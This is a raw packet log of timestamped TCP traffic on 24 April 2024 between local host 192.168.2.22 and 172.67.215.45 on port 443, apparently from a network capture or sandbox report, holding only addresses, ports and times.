Apr 24, 2024 10:24:11.652683973 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.652693033 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.652705908 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.652745008 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.654211044 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.654233932 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.654257059 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.654267073 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.654280901 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.654300928 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.656241894 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.656265974 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.656294107 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.656303883 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.656318903 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.656457901 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.658185005 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.658205986 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.658236027 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.658245087 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.658260107 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.658286095 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.661113024 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.661134005 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.661163092 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.661173105 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.661185980 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.661251068 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.663302898 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.663331032 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.663388014 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.663398981 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.663618088 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.663883924 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.663904905 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.663928032 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.663934946 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.663949013 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.664020061 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.665621042 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.665641069 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.665677071 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.665689945 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.665703058 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.665862083 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.667176008 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.667198896 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.667229891 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.667243004 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.667256117 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.667355061 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.667373896 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.667397022 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.667402983 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.667418957 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.668200970 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.670211077 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.670231104 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.670267105 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.670278072 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.670289993 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.670448065 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.673341036 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.673362017 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.673402071 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.673418045 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.673432112 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.673496962 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.674312115 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.674330950 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.674360991 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.674370050 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.674385071 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.674397945 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.676243067 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.676265001 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.676292896 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.676304102 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.676318884 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.676393986 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.678122044 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.678139925 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.678170919 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.678183079 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.678195953 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.678245068 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.679708004 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.679725885 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.679754972 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.679764032 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.679783106 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.679790020 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.681940079 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.681960106 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.681993961 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.682007074 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.682020903 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.682061911 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.683378935 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.683402061 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.683428049 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.683437109 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.683451891 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.683463097 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.685082912 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.685111046 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.685148001 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.685159922 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.685172081 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.685240984 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.686589956 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.686614037 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.686638117 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.686645985 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.686659098 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.686671972 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.688385010 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.688414097 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.688436985 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.688447952 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.688461065 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.688509941 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.690002918 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.690027952 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.690053940 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.690062046 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.690080881 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.690094948 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.691639900 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.691668987 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.691693068 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.691703081 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.691716909 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.691735983 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.696449041 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.696475029 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.696500063 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.696517944 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.696531057 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.696644068 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.697858095 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.697885036 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.697907925 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.697918892 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.697933912 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.698296070 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.699120998 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.699145079 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.699167013 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.699177027 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.699192047 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.699243069 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.701235056 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.701263905 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.701293945 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.701308012 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.701320887 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.701472044 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.702348948 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.702379942 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.702395916 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.702404022 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.702420950 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.702491999 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.702662945 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.702682972 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.702704906 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.702709913 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.702722073 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.702794075 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.703649998 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.703668118 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.703696966 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.703704119 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.703721046 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.704055071 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.706459999 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.706485033 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.706522942 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.706533909 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.706547976 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.706653118 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.707375050 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.707396030 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.707418919 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.707426071 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.707439899 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.707474947 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.709114075 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.709139109 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.709166050 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.709175110 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.709191084 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.709211111 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.710980892 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.711009979 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.711029053 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.711039066 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.711061954 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.711083889 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.713011026 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.713042021 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.713061094 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.713069916 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.713083982 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.714509964 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.714534044 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.714546919 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.714555025 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.714570999 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.714579105 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.714606047 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.714611053 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.715609074 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.715631008 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.715665102 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.715672970 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.715687990 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.715774059 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.717439890 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.717490911 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.717500925 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.717544079 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.720175982 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.720206022 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.720232964 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.720242023 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.720256090 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.721158981 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.721185923 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.721208096 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.721215010 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.721230030 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.721247911 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.723814011 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.723838091 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.723860979 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.723870993 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.723884106 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.724116087 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.725842953 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.725867033 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.725907087 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.725915909 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.725930929 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.726269960 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.726445913 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.726468086 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.726486921 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.726492882 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.726506948 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.726583004 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.727940083 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.727962017 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.727993011 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.728002071 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.728018045 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.728029966 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.729774952 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.729800940 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.729820013 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.729830980 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.729846001 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.730046988 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.731657028 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.731681108 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.731712103 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.731720924 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.731734991 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.731751919 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.732933998 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.732961893 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.732988119 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.732997894 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.733012915 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.733088970 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.734698057 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.734723091 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.734745979 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.734754086 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.734767914 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.734778881 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.736296892 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.736327887 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.736358881 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.736367941 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.736382008 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.736917973 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.737531900 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.737565994 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.737580061 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.737587929 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.737603903 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.739253998 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.739285946 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.739300966 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.739310026 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.739330053 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.739463091 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.740828991 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.740852118 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.740883112 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.740895987 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.740910053 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.742634058 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.742661953 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.742676973 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.742686033 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.742702961 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.743601084 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.743622065 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.743654966 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.743664026 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.743676901 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.745429993 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.745456934 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.745486021 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.745496035 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.745511055 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.746483088 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.746500969 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.746536970 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.746546984 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.746560097 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.747776985 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.748488903 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.748507977 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.748544931 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.748553038 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.748568058 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.749505043 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.749527931 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.749553919 CEST	49163	443	192.168.2.22	172.67.215.45
